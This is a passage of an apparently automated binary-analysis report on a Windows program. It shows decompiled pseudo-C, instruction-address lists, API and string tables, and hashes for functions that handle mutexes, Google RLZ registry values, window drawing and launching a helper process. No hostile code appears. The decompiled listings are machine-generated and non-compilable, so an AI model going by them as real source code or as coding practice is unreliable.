							 *((char*)(_t172 + 0x1b)) = 0;
							_t121 = L004C7AA0(_t125, _t143, _t172 + 0x2c);
							_t141 = _t172 + 0x1c;
							__eflags = _t121;
							if(_t121 == 0) {
								goto L33;
							} else {
								 *((char*)(_t172 + 0x1d8)) = 3;
								L004C8A50(_t141, _t143);
							}
							L19:
							_t143 =  *(_t172 + 0x38);
							_t169 = _t169 + 1;
							__eflags =  *(_t143 + _t169 * 4);
							_t162 = _t143 + _t169 * 4;
						} while (__eflags != 0);
						goto L20;
					}
					L4:
					_t78 =  *(_t172 + 0x20);
					if(_t78 != 0 && _t78 != 0x80000001) {
						RegCloseKey(_t78);
					}
					ReleaseMutex(_t158);
					goto L8;
				}
			}

0x004c5030
0x004c5030
0x004c5030
0x004c5032
0x004c503d
0x004c503e
0x004c5044
0x004c504b
0x004c5056
0x004c505d
0x004c5065
0x004c5075
0x004c5077
0x004c507a
0x004c507e
0x004c5081
0x004c508b
0x004c508d
0x004c508e
0x004c5092
0x004c5097
0x004c509c
0x004c50ac
0x004c50ac
0x004c50b1
0x004c50bd
0x004c50f5
0x004c50f6
0x004c50fc
0x00000000
0x004c50bf
0x004c50bf
0x004c50c7
0x004c50d6
0x004c5103
0x004c5105
0x00000000
0x00000000
0x004c5111
0x004c5116
0x004c511e
0x004c5122
0x004c5126
0x004c512a
0x004c512f
0x004c5131
0x004c5344
0x004c5348
0x004c5351
0x004c535a
0x004c535f
0x004c530e
0x004c5315
0x004c531d
0x004c531e
0x004c5320
0x004c5335
0x004c5335
0x004c513b
0x004c514c
0x004c5154
0x004c5159
0x004c515d
0x004c5160
0x004c5165
0x004c5167
0x004c533b
0x004c533f
0x00000000
0x004c533f
0x004c516d
0x004c5171
0x004c5173
0x004c5178
0x004c517a
0x004c521c
0x004c521e
0x004c522d
0x004c5232
0x004c5234
0x004c528a
0x004c5290
0x004c5294
0x004c52a0
0x004c52a9
0x004c52ad
0x004c52ae
0x004c52b0
0x004c52b4
0x004c52ba
0x004c52ba
0x004c52bc
0x004c52c8
0x004c52d1
0x004c52d5
0x004c52d6
0x004c52d8
0x004c52dc
0x004c52e2
0x004c52e2
0x004c52e4
0x004c52e8
0x004c52ea
0x004c52ec
0x004c52f1
0x004c52f4
0x004c52f4
0x004c52f1
0x004c52fa
0x004c52ff
0x004c5306
0x004c530c
0x00000000
0x004c530c
0x004c5236
0x004c523f
0x00000000
0x00000000
0x004c5241
0x004c5245
0x004c5251
0x004c525e
0x004c5266
0x004c526b
0x004c526f
0x004c5276
0x004c527b
0x004c527d
0x004c527f
0x004c5336
0x004c5336
0x00000000
0x004c5336
0x004c5285
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5180
0x004c5180
0x004c5187
0x004c518c
0x004c518f
0x004c5191
0x00000000
0x00000000
0x004c519a
0x004c519c
0x004c519e
0x00000000
0x00000000
0x004c51a4
0x004c51a9
0x004c51ae
0x004c51b6
0x004c51bb
0x004c51bd
0x004c51bd
0x004c51c6
0x004c51c7
0x004c51cc
0x004c51d7
0x004c51dc
0x004c51e0
0x004c51e7
0x004c51ec
0x004c51f1
0x004c51f5
0x004c51f7
0x00000000
0x004c51fd
0x004c51fd
0x004c5205
0x004c5205
0x004c520a
0x004c520a
0x004c520e
0x004c520f
0x004c5213
0x004c5213
0x00000000
0x004c5180
0x004c50d8
0x004c50d8
0x004c50de
0x004c50e8
0x004c50e8
0x004c50ef
0x00000000
0x004c50ef

APIs

CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,00000000,00000002,?,00000000), ref: 004C5085
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004C50A4
RegCloseKey.ADVAPI32(80000001), ref: 004C50E8
ReleaseMutex.KERNEL32(00000000), ref: 004C50EF
CloseHandle.KERNEL32(00000000), ref: 004C50F6
RegCloseKey.ADVAPI32(?), ref: 004C52F4
ReleaseMutex.KERNEL32(?), ref: 004C52FF
CloseHandle.KERNEL32(?), ref: 004C5306

Strings

&%s=, xrefs: 004C5145
rep=2, xrefs: 004C510C
%s%s%s%s, xrefs: 004C51CE
&%s=%s, xrefs: 004C5257
rlz, xrefs: 004C5140
{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}, xrefs: 004C506B
dcc, xrefs: 004C5252

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Mutex$HandleRelease$CreateObjectSingleWait
String ID: %s%s%s%s$&%s=$&%s=%s$dcc$rep=2$rlz${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
API String ID: 3553343216-2145161418
Opcode ID: a9930248b6f4a55283a653c784296e3254d804e87ec042039aabf0a4d0b619d1
Instruction ID: 2e6d6c032d780186d50723b4000693eedd8a23ecc3c78c96de9776739152e65a
Opcode Fuzzy Hash: a9930248b6f4a55283a653c784296e3254d804e87ec042039aabf0a4d0b619d1
Instruction Fuzzy Hash: FA8137341087808FD3A0DB29C841F9FB7E4BF95308F44495EF88597392DB79A945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004495F0, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004495F0(void* __ecx, void* __edx) {
				signed int _v8;
				struct tagRECT _v32;
				struct tagRECT _v56;
				int _v60;
				struct HWND__* _v64;
				int _v68;
				int _v72;
				int _v76;
				int _v80;
				void* _v84;
				long _v88;
				int _v92;
				void* _v96;
				WCHAR* _v100;
				WCHAR* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t101;
				struct HWND__* _t105;
				void* _t114;
				void* _t115;
				signed char _t117;
				int _t120;
				WCHAR* _t135;
				struct HDC__* _t148;
				void* _t149;
				void* _t150;
				signed int _t157;
				void* _t172;
				struct tagRECT* _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				void* _t192;
				void* _t194;
				signed int _t195;

				_t172 = __edx;
				_t197 = (_t195 & 0xfffffff8) - 0x54;
				_t101 =  *0x5596fc; // 0x9d48295
				_v8 = _t101 ^ (_t195 & 0xfffffff8) - 0x00000054;
				_t191 = __ecx;
				if(IsWindow( *(__ecx + 4)) != 0) {
					if( *((intOrPtr*)(_t191 + 0x24)) != 0 ||  *((intOrPtr*)(_t191 + 0x28)) != 0) {
						_t105 =  *(_t191 + 4);
						_v64 = _t105;
						_t148 = GetDC(_t105);
						_v56.left = 0;
						_v56.top = 0;
						_v56.right = 0;
						_v56.bottom = 0;
						GetClientRect( *(_t191 + 4),  &_v56);
						_t174 = _v56.right;
						_t187 = _t191 + 0x38;
						_t187->left = _v56.left;
						_t187->top = _v56.top;
						_t187->right = _v56.right;
						_t187->bottom = _v56.bottom;
						if(( *(_t191 + 0x58) & 0x00000001) != 0) {
							if(( *(_t191 + 0x54) >> 0x00000004 & 0x00000001) == 0) {
								_t114 =  *(_t191 + 0x30);
								_v76 = 0;
								if(_t114 != 0) {
									_v84 = SelectObject(_t148, _t114);
								}
								_t115 =  *((intOrPtr*)(_t191 + 0x24));
								if(_t115 == 0) {
									_v84 =  *((intOrPtr*)(_t191 + 0x28));
								} else {
									_v84 = _t115;
								}
								_t117 = GetWindowLongW( *(_t191 + 4), 0xfffffff0);
								_t157 = 0;
								_t174 = _t117 & 0x00000001;
								_v68 = _t117;
								_v80 = _t174;
								if(_t174 == 0) {
									if((_t117 & 0x00000002) != 0) {
										_t157 = 2;
									}
								} else {
									_t157 = 1;
								}
								DrawTextW(_t148, _v84, 0xffffffff, _t187, _t157 | 0x00000410);
								if( *(_t191 + 0x30) != 0) {
									_t174 = _v76;
									SelectObject(_t148, _t174);
								}
								if(_v80 == 0) {
									if((_v68 & 0x00000002) != 0) {
										_t120 = _v56.right -  *((intOrPtr*)(_t191 + 0x40));
										goto L26;
									}
								} else {
									asm("cdq");
									_t120 = _v56.right -  *((intOrPtr*)(_t191 + 0x40)) - _t174 >> 1;
									L26:
									OffsetRect(_t187, _t120, 0);
								}
							} else {
								_v72 = 0;
								_v60 = 0;
								_v84 = 0;
								_v76 = 0;
								_v80 = 0;
								_v68 = 0;
								L00449A60(_t191,  &_v72,  &_v60,  &_v84,  &_v76,  &_v80,  &_v68);
								_v112 = SelectObject(_t148,  *(_t191 + 0x34));
								_v56.left = _v88;
								_v56.bottom = _v76;
								_t135 = _v104;
								_v56.top = _v84;
								_v56.right = _v80;
								if(_t135 != 0) {
									DrawTextW(_t148, _t135, _v68,  &_v32, 0x410);
								}
								SelectObject(_t148,  *(_t191 + 0x30));
								_v56.left = _v72;
								_v56.top = _v68;
								_v56.right = _v64;
								_v56.bottom = _v60;
								if(_v88 != 0) {
									_v56.left = _v32.left;
								}
								DrawTextW(_t148, _v100, _v92,  &_v56, 0x410);
								SelectObject(_t148, _v96);
								_t174 = _v60;
								_t187->left = _v64;
								_t187->top = _v60;
								_t187->right = _v56.left;
								_t187->bottom = _v56.top;
							}
						}
						ReleaseDC(_v64, _t148);
						_pop(_t188);
						_pop(_t192);
						_pop(_t149);
						return L004EEDC9(1, _t149, _v8 ^ _t197, _t174, _t188, _t192);
					} else {
						goto L1;
					}
				} else {
					L1:
					_pop(_t189);
					_pop(_t194);
					_pop(_t150);
					return L004EEDC9(0, _t150, _v8 ^ _t197, _t172, _t189, _t194);
				}
			}

0x004495f0
0x004495f6
0x004495f9
0x00449600
0x00449606
0x00449615
0x0044962f
0x00449637
0x0044963b
0x0044964c
0x00449652
0x0044965a
0x0044965e
0x00449662
0x00449666
0x00449678
0x0044967c
0x0044967f
0x00449685
0x00449688
0x0044968b
0x0044968e
0x0044969d
0x004497af
0x004497b2
0x004497bc
0x004497c6
0x004497c6
0x004497ca
0x004497cf
0x004497da
0x004497d1
0x004497d1
0x004497d1
0x004497e4
0x004497ec
0x004497ee
0x004497f1
0x004497f5
0x004497f9
0x00449804
0x00449806
0x00449806
0x004497fb
0x004497fb
0x004497fb
0x0044981b
0x00449825
0x00449827
0x0044982d
0x0044982d
0x00449838
0x0044984d
0x00449853
0x00000000
0x00449853
0x0044983a
0x00449841
0x00449844
0x00449856
0x0044985a
0x0044985a
0x004496a3
0x004496a5
0x004496a9
0x004496ad
0x004496b1
0x004496b5
0x004496b9
0x004496dd
0x004496f5
0x004496fd
0x00449705
0x00449709
0x0044970d
0x00449711
0x00449717
0x0044972a
0x0044972a
0x0044973b
0x0044974e
0x00449756
0x0044975a
0x0044975e
0x00449762
0x00449768
0x00449768
0x00449781
0x0044978d
0x00449793
0x0044979b
0x004497a1
0x004497a4
0x004497a7
0x004497a7
0x0044969d
0x00449866
0x00449870
0x00449871
0x00449872
0x0044987f
0x00000000
0x00000000
0x00000000
0x00449617
0x00449617
0x00449619
0x0044961a
0x0044961b
0x0044962a
0x0044962a

APIs

IsWindow.USER32(?), ref: 0044960D
GetDC.USER32(?), ref: 0044963F
GetClientRect.USER32 ref: 00449666
SelectObject.GDI32(00000000,?), ref: 004496E7
DrawTextW.USER32(00000000,?,?,?,00000410), ref: 0044972A
SelectObject.GDI32(00000000,?), ref: 0044973B

Strings

https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN, xrefs: 00449605

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$ClientDrawRectTextWindow
String ID: https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN
API String ID: 452443381-950128553
Opcode ID: 301c6677afbca942ad6eccd49aeb1ea71d7c0363537a55380391e826bafa7b82
Instruction ID: 37907fb914c6d49d162fc2ca2766324b955e0c23146b83ade821670ec174c477
Opcode Fuzzy Hash: 301c6677afbca942ad6eccd49aeb1ea71d7c0363537a55380391e826bafa7b82
Instruction Fuzzy Hash: 3A8102B5618741AFD314CF69C884A6BBBE8FF99704F004A2EF98A83350D774E845CB56

Uniqueness

Uniqueness Score: -1.00%

Function 004C65A0, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 134
synchronizationregistrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004C65A0(void* __ecx, int __edx, void* __eflags) {
				char _v4;
				char _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v28;
				char _v32;
				WCHAR* _v36;
				signed int _t28;
				void* _t32;
				WCHAR* _t39;
				int _t43;
				void* _t44;
				signed int _t50;
				void* _t51;
				signed int _t56;
				void* _t70;
				char* _t72;
				void* _t75;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t85;
				signed int _t86;
				void* _t87;
				void* _t90;

				_t90 = __eflags;
				_t68 = __edx;
				_push(0xffffffff);
				_push(0x513b90);
				_push( *[fs:0x0]);
				_t86 = _t85 - 0x1c;
				_t28 =  *0x5596fc; // 0x9d48295
				_push(_t28 ^ _t86);
				 *[fs:0x0] =  &_v12;
				_t75 = __ecx;
				_t56 = 0;
				_v32 = 0;
				_t70 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
				_push(_t70);
				_v28 = _t70;
				_t32 = L004C5D10(_t68, _t90);
				_t87 = _t86 + 4;
				if(_t32 != 0) {
					_t56 = 0 | WaitForSingleObject(_t70, 0x1388) == 0x00000000;
					_v32 = 0;
				}
				_v4 = 0;
				if(_t56 == 0) {
					L7:
					_push(_t70);
					goto L8;
				} else {
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v4 = 1;
					if(E00401690(L"Software\\Google\\Common\\Rlz",  &_v24, 0x2021f) == 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							L14:
							_push(_t75);
							_push( &_v36);
							E004C6390();
							_t39 = _v36;
							_t77 = _v24;
							_t87 = _t87 + 8;
							_t72 = _t39;
							__eflags = _t39;
							if(_t39 == 0) {
								L16:
								L004C8A50( &_v36, _t68);
								__eflags = _t77;
								if(_t77 != 0) {
									RegCloseKey(_t77);
								}
								_t78 = _v28;
								ReleaseMutex(_t78);
								_push(_t78);
								L8:
								CloseHandle();
								 *[fs:0x0] = _v12;
								return 0;
							} else {
								_t43 = lstrlenW(_t39);
								_t21 = _t43 + 2; // 0x2
								_t68 = _t43 + _t21;
								_t44 = RegSetValueExW(_t77, L"DCC", 0, 1, _t72, _t43 + _t21);
								__eflags = _t44;
								if(_t44 == 0) {
									L004C8A50( &_v36, _t68);
									__eflags = _t77;
									if(_t77 != 0) {
										RegCloseKey(_t77);
									}
									_t79 = _v28;
									ReleaseMutex(_t79);
									CloseHandle(_t79);
									 *[fs:0x0] = _v12;
									return 1;
								} else {
									goto L16;
								}
							}
						} else {
							_t50 = 0;
							__eflags =  *_t75;
							if( *_t75 == 0) {
								goto L14;
							} else {
								while(1) {
									__eflags = _t50 - 0x80;
									if(_t50 >= 0x80) {
										goto L4;
									}
									_t50 = _t50 + 1;
									__eflags =  *(_t75 + _t50 * 2);
									if( *(_t75 + _t50 * 2) != 0) {
										continue;
									} else {
										goto L14;
									}
									goto L22;
								}
								goto L4;
							}
						}
					} else {
						L4:
						_t51 = _v24;
						if(_t51 != 0) {
							RegCloseKey(_t51);
						}
						ReleaseMutex(_t70);
						goto L7;
					}
				}
				L22:
			}

0x004c65a0
0x004c65a0
0x004c65a0
0x004c65a2
0x004c65ad
0x004c65ae
0x004c65b5
0x004c65bc
0x004c65c1
0x004c65c7
0x004c65d1
0x004c65d4
0x004c65de
0x004c65e0
0x004c65e1
0x004c65e5
0x004c65ea
0x004c65ef
0x004c65ff
0x004c6602
0x004c6602
0x004c6606
0x004c660c
0x004c6652
0x004c6652
0x00000000
0x004c660e
0x004c660e
0x004c6612
0x004c6616
0x004c662e
0x004c663a
0x004c666f
0x004c6671
0x004c668e
0x004c6692
0x004c6693
0x004c6694
0x004c6699
0x004c669d
0x004c66a1
0x004c66a4
0x004c66a6
0x004c66a8
0x004c66ca
0x004c66ce
0x004c66d3
0x004c66d5
0x004c66d8
0x004c66d8
0x004c66de
0x004c66e3
0x004c66e9
0x004c6653
0x004c6653
0x004c665f
0x004c666e
0x004c66aa
0x004c66ab
0x004c66b1
0x004c66b1
0x004c66c0
0x004c66c6
0x004c66c8
0x004c66f3
0x004c66f8
0x004c66fa
0x004c66fd
0x004c66fd
0x004c6703
0x004c6708
0x004c670f
0x004c671b
0x004c672a
0x00000000
0x00000000
0x00000000
0x004c66c8
0x004c6673
0x004c6673
0x004c6675
0x004c6678
0x00000000
0x004c6680
0x004c6680
0x004c6680
0x004c6685
0x00000000
0x00000000
0x004c6687
0x004c6688
0x004c668c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004c668c
0x00000000
0x004c6680
0x004c6678
0x004c663c
0x004c663c
0x004c663c
0x004c6642
0x004c6645
0x004c6645
0x004c664c
0x00000000
0x004c664c
0x004c663a
0x00000000

APIs

CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,FFFFFFFF,00000001,00000000,00000000), ref: 004C65D8
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004C65F7
RegCloseKey.ADVAPI32(?), ref: 004C6645
ReleaseMutex.KERNEL32(00000000), ref: 004C664C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004C6653
lstrlenW.KERNEL32(?,?,0002021F), ref: 004C66AB
RegSetValueExW.ADVAPI32(?,DCC,00000000,00000001,?,00000002), ref: 004C66C0
RegCloseKey.ADVAPI32(?,?,0002021F), ref: 004C66D8
ReleaseMutex.KERNEL32(?,?,0002021F), ref: 004C66E3
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004C66FD
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004C6708
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004C670F

Strings

DCC, xrefs: 004C66BA
{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}, xrefs: 004C65C9
Software\Google\Common\Rlz, xrefs: 004C6624

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Mutex$Release$Handle$CreateObjectSingleValueWaitlstrlen
String ID: DCC$Software\Google\Common\Rlz${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
API String ID: 4144916664-2800988495
Opcode ID: 201388cde2c4da7d3c640f7329558fdd756c5c0e5a7e0c9774716c177765ec39
Instruction ID: 3f2148d84523ded1ce25719b7405d3aae7f982d4b23dc9df9a99c25775b65ec6
Opcode Fuzzy Hash: 201388cde2c4da7d3c640f7329558fdd756c5c0e5a7e0c9774716c177765ec39
Instruction Fuzzy Hash: EE41043A504344ABC3209F21DC48E6BBBE8FFAA354F45491EF44193250DB39990ADB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C100, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 356COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040C14D
std::_Xinvalid_argument.LIBCPMT ref: 0040C170
_memmove.LIBCMT ref: 0040C1CE
_memmove.LIBCMT ref: 0040C1F5
_memmove.LIBCMT ref: 0040C20A
_memmove.LIBCMT ref: 0040C23A
_memmove.LIBCMT ref: 0040C3D5
std::_Xinvalid_argument.LIBCPMT ref: 0040C409

Strings

string too long, xrefs: 0040C148, 0040C16B
invalid string position, xrefs: 0040C404

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: b2ecf377ef10707a4c976112d764b5a9351d2708477616277a28b1c4928c2491
Instruction ID: fec2733f6f63565a70354a2ee0d581cd4790efa1bddb06e8db3addcb9ce23dc0
Opcode Fuzzy Hash: b2ecf377ef10707a4c976112d764b5a9351d2708477616277a28b1c4928c2491
Instruction Fuzzy Hash: 3DB18230314240CBDA18DF59DDD592FB7A6EB817047244E3EE482EB7C2D638EC85879A

Uniqueness

Uniqueness Score: -1.00%

Function 004471C0, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(09D48295,000000F0), ref: 004471E2
GetParent.USER32 ref: 004471F5
GetWindow.USER32(?,00000004), ref: 00447202
GetWindowRect.USER32 ref: 00447212
GetWindowLongW.USER32(00000000,000000F0), ref: 00447227
MonitorFromWindow.USER32(?,00000002), ref: 00447242
GetMonitorInfoW.USER32 ref: 00447273
GetWindowRect.USER32 ref: 004472B9
SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,?,?,00000004), ref: 00447377

Strings

(, xrefs: 0044726B

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$LongMonitorRect$FromInfoParent
String ID: (
API String ID: 1468510684-3887548279
Opcode ID: 00dfef845f2449e0efc71146e7aa8a50e83b5afa86b0af5f73d9884c103dc519
Instruction ID: 72c73ccff3c450b80423396deb5880e4098bb01729176bc4e3d02158a92d618b
Opcode Fuzzy Hash: 00dfef845f2449e0efc71146e7aa8a50e83b5afa86b0af5f73d9884c103dc519
Instruction Fuzzy Hash: B4517C712087029FD314CF69C885A2BB7E5BFD9754F104A2EF846D3390EB74E9068B96

Uniqueness

Uniqueness Score: -1.00%

Function 004C33F0, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 173registrysynchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,FFFFFFFF,00000001,00000000,00000000,?,?,?,?,?,00000000,00517520,000000FF), ref: 004C3426
WaitForSingleObject.KERNEL32(00000000,00001388,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C3445

Part of subcall function 004C3630: CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,?,09D48295,?,00000000), ref: 004C3671
Part of subcall function 004C3630: WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004C3690
Part of subcall function 004C3630: RegCloseKey.ADVAPI32(80000001), ref: 004C36CD
Part of subcall function 004C3630: ReleaseMutex.KERNEL32(00000000), ref: 004C36D4
Part of subcall function 004C3630: CloseHandle.KERNEL32(00000000), ref: 004C36DB

RegCloseKey.ADVAPI32(80000001), ref: 004C34A3
ReleaseMutex.KERNEL32(00000000), ref: 004C34AA
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C34B1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C3543
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C3555
ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C3558
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C355F
RegDeleteValueW.ADVAPI32(?,0053B900,?,?,?,?,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C3585

Part of subcall function 0040EDA0: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,0040E2BD,00000000,?), ref: 0040EDC7

Part of subcall function 00401590: RegCloseKey.ADVAPI32(00000000,00403512,?,?,?,?,?,?,?,?,?,?,?,00510206,000000FF), ref: 00401597

Part of subcall function 004C7B10: RegCloseKey.ADVAPI32(?,004C4AED,00000000,00512DA0,000000FF,004C280F,?,?,?,00000008,?,?,00000005,?,?,?), ref: 004C7B1E

Part of subcall function 004C5DF0: ReleaseMutex.KERNEL32(?,004C4D22,?,00000008,?,?), ref: 004C5DF9
Part of subcall function 004C5DF0: CloseHandle.KERNEL32(?,004C4D22,?,00000008,?,?), ref: 004C5E03

Strings

%s\%s, xrefs: 004C34FA
RLSs, xrefs: 004C34F0
{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}, xrefs: 004C3417
Software\Google\Common\Rlz, xrefs: 004C34F5

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Mutex$HandleRelease$CreateObjectSingleValueWait$DeleteQuery
String ID: %s\%s$RLSs$Software\Google\Common\Rlz${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
API String ID: 1068256509-622109328
Opcode ID: 18222df63f4a0be33db027b6361ce939ef6814e16cd9f9508b54f52696cc81eb
Instruction ID: 9ad167219fdc974efcf394821ae97df5fefa4b5376cbeaad9039a2a8585a5b34
Opcode Fuzzy Hash: 18222df63f4a0be33db027b6361ce939ef6814e16cd9f9508b54f52696cc81eb
Instruction Fuzzy Hash: AA51003A1083409BC350DF25D841B6FBBE4EF95759F40492FF94193251DB3DEA09CA6A

Uniqueness

Uniqueness Score: -1.00%

Function 00406430, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156processsynchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00406491
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,00000001), ref: 004064A5
_wcsrchr.LIBCMT ref: 004064B2
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00406524
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000), ref: 00406562
_memset.LIBCMT ref: 00406571
CreateProcessW.KERNEL32 ref: 004065A0
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004065B0
CloseHandle.KERNEL32(00000000), ref: 004065C1
CloseHandle.KERNEL32(00000000), ref: 004065C8

Strings

Fatal error, xrefs: 004065CE
D, xrefs: 00406598
DebugMessage.exe, xrefs: 004064EB

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
